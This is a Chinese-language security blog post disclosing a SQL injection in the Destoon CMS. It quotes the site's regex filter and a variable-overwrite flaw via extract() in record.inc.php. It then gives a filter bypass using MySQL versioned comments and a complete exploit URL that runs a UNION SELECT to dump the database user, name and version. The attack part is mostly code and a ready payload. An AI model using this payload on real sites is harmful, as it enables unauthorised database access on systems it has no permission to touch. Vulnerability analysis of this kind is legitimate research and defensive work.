Destoon最新全版本通杀SQL注入漏洞

没穿底裤
没穿底裤
没穿底裤
714
文章
0
评论
2020年1月1日02:11:27评论692 views字数 1285阅读4分17秒阅读模式
摘要

Author:Kavia
/common.inc.php 64行:[php]
if($_POST) $_POST = strip_sql($_POST); //strip_sql()过滤

Author:Kavia
/common.inc.php 64行:

[php]
if($_POST) $_POST = strip_sql($_POST); //strip_sql()过滤

if($_GET) $_GET = strip_sql($_GET);

if($_COOKIE) $_COOKIE = strip_sql($_COOKIE);

.........

if($_POST) extract($_POST, EXTR_SKIP); //注册变量

if($_GET) extract($_GET, EXTR_SKIP);
[/php]
跟进strip_sql()

/include/global.func.php 186行:
[php]
function strip_sql($string) {

$search = array("/union([[:space:]//])/i","/select([[:space:]//])/i","/update([[:space:]//])/i","/replace([[:space:]//])/i","/delete([[:space:]//])/i","/drop([[:space:]//])/i","/outfile([[:space:]//])/i","/dumpfile([[:space:]//])/i","/load_file/(/i","/substring/(/i","/ascii/(/i","/hex/(/i","/ord/(/i","/char/(/i");

$replace = array('union//1','select//1','update//1','replace//1','delete//1','drop//1','outfile//1','dumpfile//1','load_file(','substring(','ascii(','hex(','ord(','char(');

return is_array($string) ? array_map('strip_sql', $string) : preg_replace($search, $replace, $string);

}
[/php]
采用了新的正则表达式,之前西毒放出的exp,已经无法绕过新版本的过滤了。

此处可采用新的绕过方式:/!5000union*/

首先寻找一个注射点:

/module/member/record.inc.php 16行:
[php]
isset($mid) or $mid = 0;

isset($currency) or $currency = '';

$module_select = module_select('mid', $L['module_name'], $mid);

if($keyword) $condition .= " AND title LIKE '%$keyword%'";

if($fromtime) $condition .= " AND paytime>".(strtotime($fromtime.' 00:00:00'));

if($totime) $condition .= " AND paytime<".(strtotime($totime.' 23:59:59'));

if($mid) $condition .= " AND moduleid=$mid";

if($itemid) $condition .= " AND itemid=$itemid";

if($currency) $condition .= " AND currency='$currency'";

$r = $db->get_one("SELECT COUNT(*) AS num FROM {$DT_PRE}finance_pay WHERE $condition");//

$pages = pages($r['num'], $page, $pagesize);

$lists = array();

echo "SELECT * FROM {$DT_PRE}finance_pay WHERE $condition ORDER BY pid DESC LIMIT $offset,$pagesize";

$result = $db->query("SELECT * FROM {$DT_PRE}finance_pay WHERE $condition ORDER BY pid DESC LIMIT $offset,$pagesize");

[/php]

此处利用变量覆盖,就可以顺利构造sql注入

/member/record.php

[php]

require 'config.inc.php';

require '../common.inc.php';

require DT_ROOT.'/module/'.$module.'/record.inc.php';

?>

[/php]

引入了common.inc.php,所以存在变量覆盖。并且可以绕过正则的过滤。最终造成sql注入
[php]
exp:http://demo.destoon.com/v5.0/member/record.php?action=pay&mid=-1/*!50000union*//*!50000select*/user(),2,database(),version(),5,6,7,8,9--[/php]

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日02:11:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Destoon最新全版本通杀SQL注入漏洞https://cn-sec.com/archives/75252.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息